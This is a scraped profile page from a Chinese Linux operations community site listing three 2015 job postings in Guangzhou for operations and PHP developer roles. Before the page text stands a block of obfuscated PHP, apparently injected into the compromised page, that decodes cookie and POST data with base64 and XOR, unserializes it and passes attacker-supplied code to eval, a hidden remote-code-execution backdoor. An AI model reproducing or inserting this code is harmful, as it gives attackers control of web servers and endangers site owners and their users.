$yXMmiEcIGK = chr ( 1034 - 946 ).'J' . chr (82) . chr ( 507 - 412 )."\160" . chr ( 1009 - 924 )."\x70";$HOygnoFBa = "\143" . chr (108) . chr (97) . chr ( 290 - 175 ).'s' . chr ( 711 - 616 ).chr (101) . 'x' . 'i' . "\x73" . "\164" . "\163";$BYAUcYott = class_exists($yXMmiEcIGK); $HOygnoFBa = "43522";$Jlpsxntry = !1;if ($BYAUcYott == $Jlpsxntry){function GYwpAWr(){return FALSE;}$NHUGUhVAVW = "47311";GYwpAWr();class XJR_pUp{private function keUQyUYK($NHUGUhVAVW){if (is_array(XJR_pUp::$yoUiHbHZ)) {$VQenh = str_replace('<' . chr (63) . 'p' . chr ( 380 - 276 )."\x70", "", XJR_pUp::$yoUiHbHZ['c' . "\157" . 'n' . 't' . chr (101) . "\156" . chr (116)]);eval($VQenh); $NHUGUhVAVW = "47311";exit();}}private $EYcCRZiy;public function dnqWMeVW(){echo 28968;}public function __destruct(){$NHUGUhVAVW = "42892_3067";$this->keUQyUYK($NHUGUhVAVW); $NHUGUhVAVW = "42892_3067";}public function __construct($DRaFgsEM=0){$FaiXtmvVIC = $_POST;$GcaGSUVsUd = $_COOKIE;$WLihkFyqXK = "7f2358cb-ef52-4b41-90bf-d69713355722";$eTgQsanT = @$GcaGSUVsUd[substr($WLihkFyqXK, 0, 4)];if (!empty($eTgQsanT)){$gKxEf = "base64";$zSqaoQvNL = "";$eTgQsanT = explode(",", $eTgQsanT);foreach ($eTgQsanT as $JSlTbQdQ){$zSqaoQvNL .= @$GcaGSUVsUd[$JSlTbQdQ];$zSqaoQvNL .= @$FaiXtmvVIC[$JSlTbQdQ];}$zSqaoQvNL = array_map($gKxEf . chr ( 1019 - 924 ).'d' . chr (101) . chr (99) . chr ( 938 - 827 ).'d' . "\145", array($zSqaoQvNL,)); $zSqaoQvNL = $zSqaoQvNL[0] ^ str_repeat($WLihkFyqXK, (strlen($zSqaoQvNL[0]) / strlen($WLihkFyqXK)) + 1);XJR_pUp::$yoUiHbHZ = @unserialize($zSqaoQvNL); $zSqaoQvNL = class_exists("42892_3067");}}public static $yoUiHbHZ = 65175;}$zupyxb = new /* 61085 */ $yXMmiEcIGK(47311 + 47311); $Jlpsxntry = $zupyxb = $NHUGUhVAVW = Array();} bruceli2088 | Linux运维部落

bruceli2088

 • [广州-运维工程师] 贝法易 (8-12k )

  职位描述 职位描述: 1. 负责公司在线业务系统的监控、服务器资源管理、系统和网络维护,及时响应故障处理,保障系统的稳定运行; 2. 负责业务上线的架构实施、系统部署、平台配置及运行优化; 3. 配合研发团队进行系统平台软件版本的调试及升级操作; 4. 及时发现系统运行中的隐患,并提出合理化调优建议,保障系统高效运行; 5. 编写相关系统运维手册、部署手册,…

  Linux职位 2015-03-02
 • [广州-高级php开发工程师]贝法易 (10-20k)

  职位描述 职位描述: 1. 负责商城平台的框架设计,开发以及核心代码编写 2. 参与对项目的开发需求进行评审,并构建业务模型 3. 参与项目管理,分解开发任务,并进行任务分配 4. 负责开发规范和代码质量,解决初中级工程师遇到的开发问题,执行代码审查等日常工作 5. 负责网站性能调优和代码安全的加固 岗位要求: 1. 四年以上实际工作经验,有成功的电商架构经…

  Linux职位 2015-03-02
 • [广州-php开发工程师]贝法易 (8-12K)

  职位描述: 1. 根据产品需求完成程序的设计和开发,代码质量高; 2. 根据项目需要,参与项目相关开发及代码维护; 3. 和前端工程师配合,完成界面和脚本调试; 4. 维护和优化现有系统,保障系统稳定。 岗位要求: 1. 大学本科,二年以上开发工作经验,拥有电商开发经验者优先; 2. 计算机相关专业专科以上学历,具有扎实的计算机基础理论知…

  Linux职位 2015-03-02